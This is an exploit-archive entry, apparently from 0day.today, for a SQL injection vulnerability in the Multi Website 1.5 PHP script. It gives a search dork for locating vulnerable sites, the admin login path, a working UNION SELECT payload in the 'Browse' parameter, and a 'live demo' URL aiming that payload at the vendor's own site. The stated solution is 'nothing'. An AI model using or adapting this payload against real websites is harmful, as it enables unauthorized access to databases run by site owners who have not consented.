Multi Website 1.5 (index php action) SQL Injection Vulnerability

2009-08-03T00:00:00
ID 1337DAY-ID-5605
Type zdt
Reporter sarbot511
Modified 2009-08-03T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Multi Website 1.5 (index php action) SQL Injection Vulnerability
================================================================


> > [+] Bug : Powered by Multi Website 1.5 (index php action) Remote SQL Injection Vulnerability
> >
> > [+] Script home : http://www.multi-website.com
> >
> > [+] Affected versions : 1.5
> >
> > [+] Solution : nothing .;
> > > >
> > > > =======================================================
> > > >
> > > > ==> AuThOr : SarboT511
> > > >
> > > > ==> DorK : Powered by Multi Website 1.5
> > > >
> > > > ==> Control panel script : http://localhost/[path]/admin/login.php
> > > >
> > > > ========================================================
> > > >
> > > > ==> ExplO!t :
> > > >
> > > > www.target.com/[path]/?action=vote&Browse=-1+union+select+1,@@version--
> > > >=========================================================
> > > > L!VE Demo :
> > > >
> > >  http://www.multi-website.com/demo/?action=vote&Browse=-1+union+select+1,@@version--
> > =============================================================



#  0day.today [2018-04-13]  #